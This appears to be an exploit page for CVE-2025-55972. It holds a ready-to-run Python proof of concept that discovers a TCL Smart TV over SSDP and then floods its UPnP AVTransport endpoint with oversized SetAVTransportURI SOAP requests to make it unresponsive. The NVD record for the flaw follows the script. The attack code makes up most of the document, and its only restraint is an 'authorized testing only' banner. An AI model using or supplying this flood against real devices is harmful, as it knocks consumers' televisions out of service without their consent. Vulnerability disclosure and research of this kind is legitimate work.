CVE-2025-55972

#!/usr/bin/env python3 """ CVE-2025-55972 PoC - TCL Smart TV UPnP/DLNA Denial of Service Author: Security Researcher Description: This PoC demonstrates a remote unauthenticated DoS attack against TCL Smart TV's UPnP/DLNA MediaRenderer implementation by flooding the device with malformed SetAVTransportURI SOAP requests. """ import socket import time import argparse import sys # UPnP control endpoint default port UPNP_PORT = 1900 # Malformed/oversized SetAVTransportURI SOAP request template def build_malformed_soap_request(target_ip): """Build a malformed SetAVTransportURI SOAP request with oversized payload""" # Create an oversized URI to exhaust device resources oversized_uri = "http://" + "A" * 65535 + ".malicious.com/stream.m3u8" soap_body = f'''<?xml version="1.0" encoding="utf-8"?> <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <s:Body> <u:SetAVTransportURI xmlns:u="urn:schemas-upnp-org:service:AVTransport:1"> <InstanceID>0</InstanceID> <CurrentURI>{oversized_uri}</CurrentURI> <CurrentURIMetaData></CurrentURIMetaData> </u:SetAVTransportURI> </s:Body> </s:Envelope>''' http_request = ( f"POST /AVTransport/Control HTTP/1.1\r\n" f"Host: {target_ip}:{UPNP_PORT}\r\n" f"Content-Type: text/xml; charset=\"utf-8\"\r\n" f"Content-Length: {len(soap_body)}\r\n" f"SOAPAction: \"urn:schemas-upnp-org:service:AVTransport:1#SetAVTransportURI\"\r\n" f"Connection: keep-alive\r\n" f"\r\n" f"{soap_body}" ) return http_request.encode('utf-8') def discover_upnp_endpoint(target_ip, timeout=3): """Discover the actual UPnP control endpoint via SSDP M-SEARCH""" ssdp_request = ( "M-SEARCH * HTTP/1.1\r\n" "HOST: 239.255.255.250:1900\r\n" "MAN: \"ssdp:discover\"\r\n" "MX: 2\r\n" "ST: urn:schemas-upnp-org:service:AVTransport:1\r\n" "\r\n" ).encode('utf-8') sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.settimeout(timeout) sock.sendto(ssdp_request, (target_ip, 1900)) try: while True: data, addr = sock.recvfrom(2048) response = data.decode('utf-8', errors='ignore') if "AVTransport" in response: # Extract the control URL from the response for line in response.split('\r\n'): if line.lower().startswith('location:'): return line.split(':', 1)[1].strip() except socket.timeout: pass finally: sock.close() return f"http://{target_ip}:{UPNP_PORT}/AVTransport/Control" def flood_target(target_ip, duration=60, thread_count=10): """Flood the target with malformed SetAVTransportURI requests""" print(f"[*] Starting DoS attack against {target_ip}") print(f"[*] Duration: {duration} seconds") print(f"[*] Press Ctrl+C to stop\n") end_time = time.time() + duration request_count = 0 try: while time.time() < end_time: try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(5) sock.connect((target_ip, UPNP_PORT)) payload = build_malformed_soap_request(target_ip) sock.send(payload) request_count += 1 if request_count % 10 == 0: print(f"[+] Sent {request_count} requests...") sock.close() except (socket.error, ConnectionRefusedError, OSError) as e: # Device may become unresponsive - this indicates successful DoS if "Connection refused" in str(e): print(f"[!] Target appears unresponsive after {request_count} requests") time.sleep(0.1) continue except KeyboardInterrupt: print(f"\n[*] Attack stopped. Total requests sent: {request_count}") sys.exit(0) print(f"\n[*] Attack completed. Total requests sent: {request_count}") if __name__ == "__main__": parser = argparse.ArgumentParser(description='CVE-2025-55972 PoC - TCL Smart TV DoS') parser.add_argument('target', help='Target TV IP address') parser.add_argument('-d', '--duration', type=int, default=60, help='Attack duration in seconds') args = parser.parse_args() print("=" * 60) print("CVE-2025-55972 - TCL Smart TV UPnP/DLNA DoS PoC") print("For authorized testing only!") print("=" * 60) print() # Discover the UPnP endpoint control_url = discover_upnp_endpoint(args.target) print(f"[*] UPnP control endpoint: {control_url}") print() # Launch the flood attack flood_target(args.target, args.duration)

{"cve": {"id": "CVE-2025-55972", "sourceIdentifier": "[email protected]", "published": "2025-10-03T16:16:17.670", "lastModified": "2025-10-16T13:12:00.870", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A TCL Smart TV running a vulnerable UPnP/DLNA MediaRenderer implementation is affected by a remote, unauthenticated Denial of Service (DoS) condition. By sending a flood of malformed or oversized SetAVTransportURI SOAP requests to the UPnP control endpoint, an attacker can cause the device to become unresponsive. This denial persists as long as the attack continues and affects all forms of TV operation. Manual user control and even reboots do not restore functionality unless the flood stops."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tcl:65c655_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "2EF46958-23C3-4BA3-A136-0F4DE0420DE9"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tcl:65c655:-:*:*:*:*:*:*:*", "matchCriteriaId": "71800B88-6570-4AA3-8968-A897A498739E"}]}]}], "references": [{"url": "https://github.com/Szym0n13k/CVE-2025-55972-Remote-Unauthenticated-Denial-of-Service-DoS-in-TCL-Smart-TV-UPnP-DLNA-AVTransport", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.youtube.com/watch?v=CRik5mp4SW4", "source": "[email protected]", "tags": ["Exploit"]}]}}